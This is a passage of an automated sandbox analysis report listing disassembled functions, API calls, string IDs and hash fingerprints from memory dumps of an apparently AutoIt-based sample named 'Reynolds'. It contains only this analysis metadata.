                                                                                                      • Opcode ID: c0d1d6aa304cf5aea753b96ce6937b87738b948b12bd6a99439db02bd4df4919
                                                                                                      • Instruction ID: 08ffca35c67c985129960ad273473a48a531f3bbd55a682bd1acb120305290be
                                                                                                      • Opcode Fuzzy Hash: c0d1d6aa304cf5aea753b96ce6937b87738b948b12bd6a99439db02bd4df4919
                                                                                                      • Instruction Fuzzy Hash: 1D01B57290E543F6F7A6BB50F944339A371AF14B95F9A41B4C51E05270EF7EA056C320
                                                                                                      Function 00007FF7AA12FED0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 205COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                      • Opcode ID: c198a4eb709ee13625bde9cc1d7ff3a4e64f3f967d5eb97f4a55568a0741187b
                                                                                                      • Instruction ID: 0d282e385bca8fcfc4d9336b3f7017bdb8d1561576a0f1073dc87fe5040fc07c
                                                                                                      • Opcode Fuzzy Hash: c198a4eb709ee13625bde9cc1d7ff3a4e64f3f967d5eb97f4a55568a0741187b
                                                                                                      • Instruction Fuzzy Hash: 6981C776D0A202E6FBEB6F15F940239E6F0EF11780F9640B5CA1A476A0DA2DE4528771
                                                                                                      Function 00007FF7AA0F4CFC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 184comCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF7AA0F4050: MapVirtualKeyW.USER32(?,?,?,00007FF7AA0F4DDE), ref: 00007FF7AA0F4082
                                                                                                        • Part of subcall function 00007FF7AA0F4050: MapVirtualKeyW.USER32(?,?,?,00007FF7AA0F4DDE), ref: 00007FF7AA0F4090
                                                                                                        • Part of subcall function 00007FF7AA0F4050: MapVirtualKeyW.USER32(?,?,?,00007FF7AA0F4DDE), ref: 00007FF7AA0F40A0
                                                                                                        • Part of subcall function 00007FF7AA0F4050: MapVirtualKeyW.USER32(?,?,?,00007FF7AA0F4DDE), ref: 00007FF7AA0F40B0
                                                                                                        • Part of subcall function 00007FF7AA0F4050: MapVirtualKeyW.USER32(?,?,?,00007FF7AA0F4DDE), ref: 00007FF7AA0F40BE
                                                                                                        • Part of subcall function 00007FF7AA0F4050: MapVirtualKeyW.USER32(?,?,?,00007FF7AA0F4DDE), ref: 00007FF7AA0F40CC
                                                                                                        • Part of subcall function 00007FF7AA0F40DC: RegisterWindowMessageW.USER32(?,?,?,00007FF7AA0F4F68), ref: 00007FF7AA0F4146
                                                                                                      • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA0F106D), ref: 00007FF7AA0F5042
                                                                                                      • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA0F106D), ref: 00007FF7AA0F50C8
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AA0F106D), ref: 00007FF7AA13B336
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                      • String ID: AutoIt
                                                                                                      • API String ID: 1986988660-2515660138
                                                                                                      • Opcode ID: 8b9a672c5679c7d79af7300a008647115a44a4ad4b9a8e2cd430e2f10d72906a
                                                                                                      • Instruction ID: 9a5d56576958e232c33596ba283db0c4e2e473c59633ac86bc33465e4ac44089
                                                                                                      • Opcode Fuzzy Hash: 8b9a672c5679c7d79af7300a008647115a44a4ad4b9a8e2cd430e2f10d72906a
                                                                                                      • Instruction Fuzzy Hash: 96C1D571D8AB43E6F6A2AB54F980075F7B4BFA4340F9202BAD49D42670DF7CA152C760
                                                                                                      Function 00007FF7AA11B078 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: $*
                                                                                                      • API String ID: 3215553584-3982473090
                                                                                                      • Opcode ID: f489a03a3506d653c7ee3588779f7f95d69400e15805bf1bd0434c8f497717d8
                                                                                                      • Instruction ID: 1a7716bb6ff078af85fb28661e2833fd34300d4d4e5a9135dd434df762432927
                                                                                                      • Opcode Fuzzy Hash: f489a03a3506d653c7ee3588779f7f95d69400e15805bf1bd0434c8f497717d8
                                                                                                      • Instruction Fuzzy Hash: 0F61637290F242E6F766AE24E0C427CB7B4EB05B48F9612B9CA4E451B5CF2CE447C721
                                                                                                      Function 00007FF7AA125EF8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID: !$acos
                                                                                                      • API String ID: 1156100317-2870037509
                                                                                                      • Opcode ID: fe5c41fd610f88853482abc0cd2e8e1d01d6fbece9f8f84a67c424940e19f963
                                                                                                      • Instruction ID: 4a6e287941ed15ac142b8110ed70d6f698a56589f09098591ae65b939aebdacb
                                                                                                      • Opcode Fuzzy Hash: fe5c41fd610f88853482abc0cd2e8e1d01d6fbece9f8f84a67c424940e19f963
                                                                                                      • Instruction Fuzzy Hash: 1961BE21D29F45D8F2239B74B850276D664AFA63D0F928376E95E35AB4DF2CE0838710
                                                                                                      Function 000002453CA29620 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen
                                                                                                      • String ID: +
                                                                                                      • API String ID: 39653677-2126386893
                                                                                                      • Opcode ID: bbf7186b85ee4b67482b1b499e3149fd4c062800f2a5c000ac25c27f8f3afe4d
                                                                                                      • Instruction ID: 03c64ac4a09dbfae11b2742086c391d8e749700157f4362a6c91e2050745432e
                                                                                                      • Opcode Fuzzy Hash: bbf7186b85ee4b67482b1b499e3149fd4c062800f2a5c000ac25c27f8f3afe4d
                                                                                                      • Instruction Fuzzy Hash: F351A223218A708BE77A8E35E158BAEBF91E355BD0F044159EBD747AC6D728D5C0CB00
                                                                                                      Function 00007FF7AA1261B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID: !$asin
                                                                                                      • API String ID: 1156100317-2188059690
                                                                                                      • Opcode ID: 41486beb716a1d3ce37726eba78a07ae1a3876e53f623111aae521f8a9e85d9d
                                                                                                      • Instruction ID: adee35d8976628d5349176fcda29d2289b3a92f25bb93f1dafa7b93744e22d7c
                                                                                                      • Opcode Fuzzy Hash: 41486beb716a1d3ce37726eba78a07ae1a3876e53f623111aae521f8a9e85d9d
                                                                                                      • Instruction Fuzzy Hash: F1619522C29F85D5F2139B74B811276E368EFA63D0F928372E95A35AB5DF2CE0434710
                                                                                                      Function 000002453CA26EC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen
                                                                                                      • String ID: +
                                                                                                      • API String ID: 39653677-2126386893
                                                                                                      • Opcode ID: d2e5f4007f08e449f8f41e5e05ed53f0d40ba1ede8cc3f59bf32b2d63b3e7f49
                                                                                                      • Instruction ID: 3c82ca7fd897361c305a600a51283018360b2bc7fba3730e006b1c2eed224172
                                                                                                      • Opcode Fuzzy Hash: d2e5f4007f08e449f8f41e5e05ed53f0d40ba1ede8cc3f59bf32b2d63b3e7f49
                                                                                                      • Instruction Fuzzy Hash: 1F51D463219AB08BEB368E25E05876EBFA1E3057D4F045249EBD747AC7C729D5C4CB00
                                                                                                      Function 000002453CA24ABA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _errno$memset
                                                                                                      • String ID: P
                                                                                                      • API String ID: 1454687054-3110715001
                                                                                                      • Opcode ID: a1f4aa3473ea68791235c49223afddbcef7459d141dbb4cbad716c7f42946042
                                                                                                      • Instruction ID: d12a4e1e7a44b0f9225a16c4dc4cf7ec21cad0222971597ebcaa2ba919c25a54
                                                                                                      • Opcode Fuzzy Hash: a1f4aa3473ea68791235c49223afddbcef7459d141dbb4cbad716c7f42946042
                                                                                                      • Instruction Fuzzy Hash: 4C517163609AE487E6738F28A4593EEBBA0F795784F044142CFD647697DB28C9C6CB00
                                                                                                      Function 00007FF7AA16AD28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                                      • String ID: P
                                                                                                      • API String ID: 135850232-3110715001
                                                                                                      • Opcode ID: f62664e60d2089e058bbf88f82fa64fb9d6e9027cc1cc1a0f268c82638e958f5
                                                                                                      • Instruction ID: 2f0e9f7b4d3022b085c1a520bff3fc3703bbd861c121ff8f7563bf05cc45b88c
                                                                                                      • Opcode Fuzzy Hash: f62664e60d2089e058bbf88f82fa64fb9d6e9027cc1cc1a0f268c82638e958f5
                                                                                                      • Instruction Fuzzy Hash: 8A41C332B09681D1F722EB15E4043ADA771EB84BA0F9B8271DA6D433E1DF38D442C721
                                                                                                      Function 00007FF7AA12E938 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 2456169464-4171548499
                                                                                                      • Opcode ID: f09a28fcae5188001d86cef28677a7ab9bc0fda8486cb330b6ca1d514bdcb2ce
                                                                                                      • Instruction ID: 3af6be7eb5cedaf97e5e7bdec71dfa1656a38c38bb609aa7233ca48c212cb9b9
                                                                                                      • Opcode Fuzzy Hash: f09a28fcae5188001d86cef28677a7ab9bc0fda8486cb330b6ca1d514bdcb2ce
                                                                                                      • Instruction Fuzzy Hash: C2412122A1A641D2EB21EF21F4007AAABB4FB88794F864031EE4D837A4DF3CD006C710
                                                                                                      Function 00007FF7AA19BCCC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Long
                                                                                                      • String ID: SysTreeView32
                                                                                                      • API String ID: 847901565-1698111956
                                                                                                      • Opcode ID: 7bb5fa9822eba039514a9ba19c73050aeebd4584b22656b65eef0b423cabdd65
                                                                                                      • Instruction ID: 02b41d3965d877e46dea92d2e474865db4460d1d97f2059b92a023b069dbe41c
                                                                                                      • Opcode Fuzzy Hash: 7bb5fa9822eba039514a9ba19c73050aeebd4584b22656b65eef0b423cabdd65
                                                                                                      • Instruction Fuzzy Hash: 2A417E3260A6C2C6E7719B24E444B9AB3A1F784764F544375DAAC07BA8DF3CD846CB50
                                                                                                      Function 00007FF7AA19B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateObjectStock
                                                                                                      • String ID: SysMonthCal32
                                                                                                      • API String ID: 2671490118-1439706946
                                                                                                      • Opcode ID: 25626af29ff67ce8d6fd7c70d4133758a87d5dadaddcd57ce23f9999b42ad6ab
                                                                                                      • Instruction ID: 15d35524104d0044be435e0698601863105c8cc2014cf2444a9b8fadb513d45e
                                                                                                      • Opcode Fuzzy Hash: 25626af29ff67ce8d6fd7c70d4133758a87d5dadaddcd57ce23f9999b42ad6ab
                                                                                                      • Instruction Fuzzy Hash: C6418C326096C2DAE370DF15F044B6AB7A1F7887A0F414225EA9903AA8DF3CD482CF40
                                                                                                      Function 000002453CA21E0B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: CCG
                                                                                                      • API String ID: 0-1584390748
                                                                                                      • Opcode ID: 54420618444acab10bb5244421e743109e1678589b264298e1a58604c8fdc360
                                                                                                      • Instruction ID: df76018ad77fcb23cfb0266da235f299d00eff85eb193abbe886be4cfeda1d4b
                                                                                                      • Opcode Fuzzy Hash: 54420618444acab10bb5244421e743109e1678589b264298e1a58604c8fdc360
                                                                                                      • Instruction Fuzzy Hash: 8721023370093843FA3B4EA5D9983791A8197847E4F2585A69FEB437D7CB2ECCC14200
                                                                                                      Function 00007FF7AA19C010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                                                      • String ID: msctls_updown32
                                                                                                      • API String ID: 1752125012-2298589950
                                                                                                      • Opcode ID: 428f94a7a59cd7bf989baa6ef0aa5c6b519b04ddf6fb8b4790f89f2c0ee1e6c4
                                                                                                      • Instruction ID: 3616b2e4d07b4c9871d55fde2e9fa36dfb2e0176740c2dab86f2030556d6a201
                                                                                                      • Opcode Fuzzy Hash: 428f94a7a59cd7bf989baa6ef0aa5c6b519b04ddf6fb8b4790f89f2c0ee1e6c4
                                                                                                      • Instruction Fuzzy Hash: 9731CE72A19B81E6EB21DB15E4807AAB371FB85B91F418175DA8D43BA8CF3CD446CB10
                                                                                                      Function 00007FF7AA19AA64 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                                                      • String ID: Listbox
                                                                                                      • API String ID: 3747482310-2633736733
                                                                                                      • Opcode ID: 2d3583662e6f7e144ee14d910da68979ea0603b7228fe14a50fd2d5f2b3179cb
                                                                                                      • Instruction ID: aafbada9daf0de9bfdbf4d2c91c083a844c5b5497398609ced6d1057b1181cec
                                                                                                      • Opcode Fuzzy Hash: 2d3583662e6f7e144ee14d910da68979ea0603b7228fe14a50fd2d5f2b3179cb
                                                                                                      • Instruction Fuzzy Hash: E0314A326096C1DAE7709F15F444A5AB7B1F7887A0F904225EAA903BA8DB3DD486CF00
                                                                                                      Function 00007FF7AA0F46E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetOpenFileNameW.COMDLG32 ref: 00007FF7AA13B0D8
                                                                                                        • Part of subcall function 00007FF7AA0F5A50: GetFullPathNameW.KERNEL32(?,00007FF7AA0F5A3D,?,00007FF7AA0F4C50,?,?,?,00007FF7AA0F109E), ref: 00007FF7AA0F5A7B
                                                                                                        • Part of subcall function 00007FF7AA0F4694: GetLongPathNameW.KERNEL32 ref: 00007FF7AA0F46B8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
